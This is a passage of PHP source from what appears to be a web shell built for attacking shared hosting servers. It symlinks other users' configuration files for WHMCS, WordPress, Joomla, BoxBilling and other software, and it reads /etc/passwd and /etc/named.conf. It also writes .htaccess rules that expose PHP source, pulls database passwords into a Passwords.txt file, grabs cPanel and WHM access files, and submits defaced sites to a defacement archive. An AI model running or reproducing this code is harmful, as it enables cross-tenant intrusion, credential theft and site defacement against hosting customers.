@symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt'); @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt'); @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt'); @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt'); @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt'); } //password grab function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[1]); $ar=trim($ar1[0]); return $ar; } $ffile=fopen('Passwords.txt','a+'); $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/GB_symconf/"; $re=$r; $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt"); $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); $usersss=$str[0]; foreach($confi as $co) { $uurl=$re.$usersss.$co; $uel=$uurl; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $uel); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); curl_close($ch); $uxl=$result['EXE']; if($uxl && preg_match('/table_prefix/i',$uxl)) { //Wordpress $dbp=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl)) { //WHMCS $dbp=entre2v2($uxl,"db_password = '","';"); if(!empty($dbp)) $pass=$dbp."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbprefix/i',$uxl)) { //Joomla $db=entre2v2($uxl,"password = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/admincpdir/i',$uxl)) { //Vbulletin $db=entre2v2($uxl,"password'] = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/DB_DATABASE/i',$uxl)) { //Other $db=entre2v2($uxl,"DB_PASSWORD', '","');"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { //Other $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { //Other $db=entre2v2($uxl,"dbpass = '","';"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } elseif($uxl && preg_match('/dbpass/i',$uxl)) { //Other $db=entre2v2($uxl,"dbpass = \"","\";"); if(!empty($db)) $pass=$db."\n"; fwrite($ffile,$pass); } } } echo "
Root Server
Passwords
Configurations
"; } else { echo "


"; } } } elseif($_GET['do'] == 'symlink') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $d0mains = @file("/etc/named.conf"); ##httaces if($d0mains){ @mkdir("GB_sym",0777); @chdir("GB_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex jancox.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo ""; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $dcount++;}}} echo "















S. No. Domains Users Symlink
" . $dcount . " ".$domains[1][0]." ".$user['name']." Symlink

"; }else{ $TEST=@file('/etc/passwd'); if ($TEST){ @mkdir("GB_sym",0777); @chdir("GB_sym"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex jancox.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo ""; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;}fclose($file); echo "













S. No. Users Symlink
" . $dcount . " " . $matches . " Symlink

";}else{if($os != "Windows"){@mkdir("GB_sym",0777);@chdir("GB_sym");@exe("ln -s / root");$file3 = ' Options Indexes FollowSymLinks DirectoryIndex jancox.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any '; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "

server symlinker


"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n";} echo '';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;} fclose($file); echo "













ID Users Symlink
" . $dcount . " " . $matches . " Symlink


";unlink("test.txt"); } else echo "
Cannot create Symlink
"; } } } elseif($_GET['do'] == 'defacerid') { echo "
Defacer:

Team:

Domains:

"; $site = explode("\r\n", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if($go) { foreach($site as $sites) { $zh = $sites; $form_url = "https://defacer.id/archives/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $form_url); curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/archives/notify'); $result = curl_exec($curl); echo $result; curl_close($curl); echo "
"; } } } elseif($_GET['do'] == 'config') { if($_POST){ $passwd = $_POST['passwd']; mkdir("cox_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("cox_config/.htaccess","w"); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_cox) { $user_config_dir = "/home/$user_cox/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_cox/.my.cnf" => "cpanel", "/home/$user_cox/.accesshash" => "WHM-accesshash", "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_cox/public_html/forum/config.php" => "phpBB", "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal", "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_cox/public_html/app/etc/local.xml" => "Magento", "/home/$user_cox/public_html/admin/config.php" => "OpenCart", "/home/$user_cox/public_html/slconfig.php" => "Sitelok", "/home/$user_cox/public_html/application/config/database.php" => "Ellislab", "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS", "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home/$user_cox/public_html/central/configuration.php" => "WHM Central", "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home/$user_cox/public_html/submitticket.php" => "WHMCS", "/home/$user_cox/public_html/configuration.php" => "Joomla", "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome", "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome", "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome", "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew", "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew", "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew", "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews", "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews", "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews", "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms", "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms", "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms", "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain", "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain", "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain", "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog", "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog", "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta", "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta", "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta", "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress", "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress", "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress", "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp", "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp", "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP", "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal", "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal", "/home/$user_cox/public_html/wp-config.php" => "WordPress", "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome", "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome", "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome", "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew", "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew", "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew", "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews", "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews", "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews", "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms", "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms", "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms", "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain", "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain", "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain", "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog", "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog", "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs", "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs", "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs", "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta", "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta", "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta", "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress", "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress", "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress", "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp", "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp", "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP", "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal", "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal", "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal", "/home1/$user_cox/.my.cnf" => "cpanel", "/home1/$user_cox/.accesshash" => "WHM-accesshash", "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb", "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia", "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS", "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS", "/home1/$user_cox/public_html/forum/config.php" => "phpBB", "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop", "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento", "/home1/$user_cox/public_html/admin/config.php" => "OpenCart", "/home1/$user_cox/public_html/slconfig.php" => "Sitelok", "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab", "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS", "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central", "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home1/$user_cox/public_html/submitticket.php" => "WHMCS", "/home1/$user_cox/public_html/configuration.php" => "Joomla", "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome", "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome", "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome", "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew", "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew", "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew", "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews", "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews", "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews", "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms", "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms", "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms", "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain", "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain", "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain", "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog", "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog", "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta", "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta", "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta", "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress", "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress", "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress", "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp", "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp", "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP", "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal", 